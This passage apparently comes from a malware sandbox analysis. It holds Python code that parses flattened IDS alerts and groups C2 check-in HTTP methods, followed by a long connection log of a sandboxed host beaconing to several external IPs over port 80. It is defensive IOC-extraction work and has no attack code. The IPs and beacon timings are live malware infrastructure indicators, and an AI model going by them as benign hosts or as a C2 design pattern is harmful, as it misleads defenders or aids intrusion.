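    """Return every (src, sport, dst, dport) split of the fused address string."""
    g = net.split(".")
    if len(g) != 7 or not all(_octet_ok(x) for x in g[:3] + g[4:6]):
        return []
    mid, tail = g[3], g[6]  # mid = src last octet + sport + dst first octet; tail = dst last octet + dport
    found = []
    for a in range(1, 4):
        for c in range(1, 4):
            src_last, sport, dst_first = mid[:a], mid[a:len(mid) - c], mid[len(mid) - c:]
            if not (_octet_ok(src_last) and _port_ok(sport) and _octet_ok(dst_first)):
                continue
            for d in range(1, 4):
                dst_last, dport = tail[:d], tail[d:]
                if _octet_ok(dst_last) and _port_ok(dport):
                    found.append((".".join(g[:3] + [src_last]), int(sport),
                                  ".".join([dst_first, g[4], g[5], dst_last]), int(dport)))
    return found


def parse_alert(row, local_host=SANDBOX_HOST, server_ports=EXPECTED_SERVER_PORTS):
    """Parse one flattened row; raise ValueError unless exactly one split fits the known facts."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    cands = [c for c in split_endpoints(m["net"]) if c[0] == local_host and c[3] in server_ports]
    if len(cands) != 1:
        raise ValueError(f"{len(cands)} consistent splits for {m['net']!r}: {cands}")
    src, sport, dst, dport = cands[0]
    return {"ts": m["ts"], "sid": int(m["sid"]), "sig": m["sig"], "sev": int(m["sev"]),
            "src": src, "sport": sport, "dst": dst, "dport": dport, "proto": m["proto"]}


def checkin_sequence(rows):
    """Per C2 endpoint, the HTTP methods of the check-ins in time order, one entry per flow."""
    flows = defaultdict(dict)          # (dst, dport) -> {(ts, sport): method}
    for r in map(parse_alert, rows):
        method = re.search(r"\((GET|POST)\)", r["sig"])
        if method:                     # ET and ETPRO both fire on the same GET flow: keep one
            flows[(r["dst"], r["dport"])][(r["ts"], r["sport"])] = method.group(1)
    return {host: [f[k] for k in sorted(f)] for host, f in flows.items()}


if __name__ == "__main__":
    for (host, port), methods in checkin_sequence(RAW_ALERTS).items():
        print(f"{host}:{port}  {' -> '.join(methods)}")
```

Without the local-host and server-port constraints, the row for 206.238.89.119 splits six different ways, all with valid octets and ports; the parser refuses to guess and raises, which is the behaviour you want when feeding extracted IOCs into a blocklist.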
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 03:32:04.434438944 CET | 49974 | 80 | 192.168.2.10 | 38.47.233.21
Jan 11, 2025 03:32:04.439263105 CET | 80 | 49974 | 38.47.233.21 | 192.168.2.10
Jan 11, 2025 03:32:04.439358950 CET | 49974 | 80 | 192.168.2.10 | 38.47.233.21
Jan 11, 2025 03:32:04.449843884 CET | 49974 | 80 | 192.168.2.10 | 38.47.233.21
Jan 11, 2025 03:32:04.454647064 CET | 80 | 49974 | 38.47.233.21 | 192.168.2.10
Jan 11, 2025 03:32:05.334860086 CET | 80 | 49974 | 38.47.233.21 | 192.168.2.10
Jan 11, 2025 03:32:05.334981918 CET | 80 | 49974 | 38.47.233.21 | 192.168.2.10
Jan 11, 2025 03:32:05.335064888 CET | 49974 | 80 | 192.168.2.10 | 38.47.233.21
Jan 11, 2025 03:32:05.420438051 CET | 49974 | 80 | 192.168.2.10 | 38.47.233.21
Jan 11, 2025 03:32:05.426165104 CET | 80 | 49974 | 38.47.233.21 | 192.168.2.10
Jan 11, 2025 03:32:20.789053917 CET | 49975 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:20.793936968 CET | 80 | 49975 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:20.794131041 CET | 49975 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:20.809668064 CET | 49975 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:20.814543009 CET | 80 | 49975 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:21.841304064 CET | 80 | 49975 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:21.841816902 CET | 80 | 49975 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:21.843288898 CET | 49975 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:22.315500975 CET | 49975 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:23.334183931 CET | 49976 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:23.339263916 CET | 80 | 49976 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:23.339385986 CET | 49976 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:23.354429007 CET | 49976 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:23.359359026 CET | 80 | 49976 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:24.371018887 CET | 80 | 49976 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:24.372013092 CET | 80 | 49976 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:24.372116089 CET | 49976 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:24.863737106 CET | 49976 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:25.895467043 CET | 49977 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:25.900881052 CET | 80 | 49977 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:25.900964022 CET | 49977 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:25.916013002 CET | 49977 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:25.921786070 CET | 80 | 49977 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:25.922060013 CET | 80 | 49977 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:26.971700907 CET | 80 | 49977 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:26.971908092 CET | 80 | 49977 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:26.972004890 CET | 49977 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:27.424885035 CET | 49977 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:28.449492931 CET | 49979 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:28.454421043 CET | 80 | 49979 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:28.454518080 CET | 49979 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:28.464070082 CET | 49979 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:28.468884945 CET | 80 | 49979 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:29.533134937 CET | 80 | 49979 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:29.533154011 CET | 80 | 49979 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:29.533345938 CET | 49979 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:29.534416914 CET | 80 | 49979 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:29.534462929 CET | 49979 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:29.536328077 CET | 49979 | 80 | 192.168.2.10 | 172.67.137.47
Jan 11, 2025 03:32:29.541239023 CET | 80 | 49979 | 172.67.137.47 | 192.168.2.10
Jan 11, 2025 03:32:34.900847912 CET | 49980 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:34.905731916 CET | 80 | 49980 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:34.906388044 CET | 49980 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:34.921533108 CET | 49980 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:34.926534891 CET | 80 | 49980 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:36.425139904 CET | 49980 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:36.471013069 CET | 80 | 49980 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:37.449778080 CET | 49981 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:37.454802990 CET | 80 | 49981 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:37.454916000 CET | 49981 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:37.470510006 CET | 49981 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:37.475696087 CET | 80 | 49981 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:38.971899986 CET | 49981 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:39.018847942 CET | 80 | 49981 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:40.001581907 CET | 49982 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:40.006392956 CET | 80 | 49982 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:40.006465912 CET | 49982 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:40.026175976 CET | 49982 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:40.031105042 CET | 80 | 49982 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:40.031127930 CET | 80 | 49982 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:41.534349918 CET | 49982 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:41.582878113 CET | 80 | 49982 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:42.629148006 CET | 49983 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:42.634690046 CET | 80 | 49983 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:42.634762049 CET | 49983 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:42.646234989 CET | 49983 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:42.651204109 CET | 80 | 49983 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:56.278297901 CET | 80 | 49980 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:56.278435946 CET | 49980 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:32:58.840929985 CET | 80 | 49981 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:32:58.841080904 CET | 49981 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:33:01.357501984 CET | 80 | 49982 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:33:01.357677937 CET | 49982 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:33:04.000214100 CET | 80 | 49983 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:33:04.000410080 CET | 49983 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:33:04.001326084 CET | 49983 | 80 | 192.168.2.10 | 206.238.89.119
Jan 11, 2025 03:33:04.006242037 CET | 80 | 49983 | 206.238.89.119 | 192.168.2.10
Jan 11, 2025 03:33:09.020979881 CET | 49984 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:09.026442051 CET | 80 | 49984 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:09.026550055 CET | 49984 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:09.042598009 CET | 49984 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:09.048346996 CET | 80 | 49984 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:10.550115108 CET | 49984 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:10.558216095 CET | 80 | 49984 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:10.560352087 CET | 49984 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:11.571729898 CET | 49985 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:11.576896906 CET | 80 | 49985 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:11.576981068 CET | 49985 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:11.594050884 CET | 49985 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:11.599242926 CET | 80 | 49985 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:12.188391924 CET | 80 | 49985 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:12.188457966 CET | 80 | 49985 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:12.188504934 CET | 49985 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:13.096991062 CET | 49985 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:14.115951061 CET | 49986 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:14.120863914 CET | 80 | 49986 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:14.120995045 CET | 49986 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:14.136616945 CET | 49986 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:14.141453028 CET | 80 | 49986 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:14.141530991 CET | 80 | 49986 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:14.741681099 CET | 80 | 49986 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:14.741775036 CET | 80 | 49986 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:14.741830111 CET | 49986 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:15.643826008 CET | 49986 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:16.663871050 CET | 49987 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:16.668857098 CET | 80 | 49987 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:16.668930054 CET | 49987 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:16.679600954 CET | 49987 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:16.685214996 CET | 80 | 49987 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:17.274293900 CET | 80 | 49987 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:17.274313927 CET | 80 | 49987 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:17.274673939 CET | 49987 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:17.278436899 CET | 49987 | 80 | 192.168.2.10 | 66.29.149.46
Jan 11, 2025 03:33:17.285320044 CET | 80 | 49987 | 66.29.149.46 | 192.168.2.10
Jan 11, 2025 03:33:22.359188080 CET | 49988 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:22.364058971 CET | 80 | 49988 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:22.364387989 CET | 49988 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:22.380213022 CET | 49988 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:22.384973049 CET | 80 | 49988 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:22.966058016 CET | 80 | 49988 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:22.966119051 CET | 80 | 49988 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:22.966175079 CET | 49988 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:23.893909931 CET | 49988 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:24.913022995 CET | 49989 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:24.918056965 CET | 80 | 49989 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:24.918222904 CET | 49989 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:24.934149027 CET | 49989 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:24.939055920 CET | 80 | 49989 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:25.551336050 CET | 80 | 49989 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:25.551363945 CET | 80 | 49989 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:25.551422119 CET | 49989 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:26.440778971 CET | 49989 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:27.459939003 CET | 49990 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:27.464946032 CET | 80 | 49990 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:27.465579987 CET | 49990 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:27.485584974 CET | 49990 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:27.490386963 CET | 80 | 49990 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:27.490626097 CET | 80 | 49990 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:28.071480989 CET | 80 | 49990 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:28.071518898 CET | 80 | 49990 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:28.071583033 CET | 49990 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:28.987916946 CET | 49990 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:30.006587982 CET | 49991 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:30.011631012 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:30.011790991 CET | 49991 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:30.021702051 CET | 49991 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:30.026547909 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:30.621088982 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:30.621104002 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:30.621119022 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:30.621124029 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:30.621345043 CET | 49991 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:30.625751019 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:30.625864029 CET | 49991 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:30.626869917 CET | 49991 | 80 | 192.168.2.10 | 217.70.184.50
Jan 11, 2025 03:33:30.631715059 CET | 80 | 49991 | 217.70.184.50 | 192.168.2.10
Jan 11, 2025 03:33:36.107466936 CET | 49992 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:36.112296104 CET | 80 | 49992 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:36.112375975 CET | 49992 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:36.127999067 CET | 49992 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:36.132919073 CET | 80 | 49992 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:37.057487011 CET | 80 | 49992 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:37.057543039 CET | 80 | 49992 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:37.057594061 CET | 49992 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:37.649231911 CET | 49992 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:38.663429976 CET | 49993 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:38.669389963 CET | 80 | 49993 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:38.669466972 CET | 49993 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:38.683995008 CET | 49993 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:38.691901922 CET | 80 | 49993 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:39.608261108 CET | 80 | 49993 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:39.608375072 CET | 80 | 49993 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:39.608448982 CET | 49993 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:40.190989017 CET | 49993 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:41.210110903 CET | 49994 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:41.215244055 CET | 80 | 49994 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:41.215409040 CET | 49994 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:41.231348038 CET | 49994 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:41.236252069 CET | 80 | 49994 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:41.236387968 CET | 80 | 49994 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:42.183360100 CET | 80 | 49994 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:42.183470011 CET | 80 | 49994 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:42.183675051 CET | 49994 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:42.737720966 CET | 49994 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:43.756841898 CET | 49995 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:43.761770010 CET | 80 | 49995 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:43.762020111 CET | 49995 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:43.774265051 CET | 49995 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:43.779114008 CET | 80 | 49995 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:44.702028990 CET | 80 | 49995 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:44.702055931 CET | 80 | 49995 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:44.702275991 CET | 49995 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:44.704905987 CET | 49995 | 80 | 192.168.2.10 | 13.228.81.39
Jan 11, 2025 03:33:44.709778070 CET | 80 | 49995 | 13.228.81.39 | 192.168.2.10
Jan 11, 2025 03:33:49.734831095 CET | 49996 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:49.739759922 CET | 80 | 49996 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:49.739825010 CET | 49996 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:49.757082939 CET | 49996 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:49.761939049 CET | 80 | 49996 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:50.195827007 CET | 80 | 49996 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:50.195965052 CET | 80 | 49996 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:50.196022034 CET | 49996 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:51.269041061 CET | 49996 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:52.287779093 CET | 49997 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:52.292819977 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:52.292938948 CET | 49997 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:52.309338093 CET | 49997 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:52.314188957 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:52.749594927 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:52.749679089 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:52.749758959 CET | 49997 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:53.815834045 CET | 49997 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:54.834853888 CET | 49998 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:54.839859962 CET | 80 | 49998 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:54.839947939 CET | 49998 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:54.855760098 CET | 49998 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:54.860616922 CET | 80 | 49998 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:54.860750914 CET | 80 | 49998 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:55.292889118 CET | 80 | 49998 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:55.292913914 CET | 80 | 49998 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:55.293008089 CET | 49998 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:56.366095066 CET | 49998 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:57.381843090 CET | 49999 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:57.386900902 CET | 80 | 49999 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:33:57.387536049 CET | 49999 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:57.397439957 CET | 49999 | 80 | 192.168.2.10 | 13.248.169.48
Jan 11, 2025 03:33:57.402308941 CET | 80 | 49999 | 13.248.169.48 | 192.168.2.10
Jan 11, 2025 03:34:00.883013010 CET | 80 | 49999 | 13.248.169.48 | 192.168.2.10
                                                          Jan 11, 2025 03:34:00.883265018 CET804999913.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:34:00.885210991 CET4999980192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:34:00.886198997 CET4999980192.168.2.1013.248.169.48
                                                          Jan 11, 2025 03:34:00.891079903 CET804999913.248.169.48192.168.2.10
                                                          Jan 11, 2025 03:34:05.923348904 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:05.928292990 CET8050000104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:05.928365946 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:05.944127083 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:05.950649023 CET8050000104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:07.456559896 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:07.461674929 CET8050000104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:07.461724997 CET5000080192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.479496002 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.484611988 CET8050001104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:08.484716892 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.499474049 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:08.504347086 CET8050001104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:10.004417896 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:10.009852886 CET8050001104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:10.010005951 CET5000180192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.022528887 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.027811050 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:11.027949095 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.044168949 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:11.049073935 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:11.049170017 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:12.550349951 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:12.555607080 CET8050002104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:12.555702925 CET5000280192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.569391966 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.574484110 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:13.576576948 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.586146116 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:13.591120005 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:15.254126072 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:15.255140066 CET8050003104.21.64.1192.168.2.10
                                                          Jan 11, 2025 03:34:15.255213022 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:15.286483049 CET5000380192.168.2.10104.21.64.1
                                                          Jan 11, 2025 03:34:15.291341066 CET8050003104.21.64.1192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
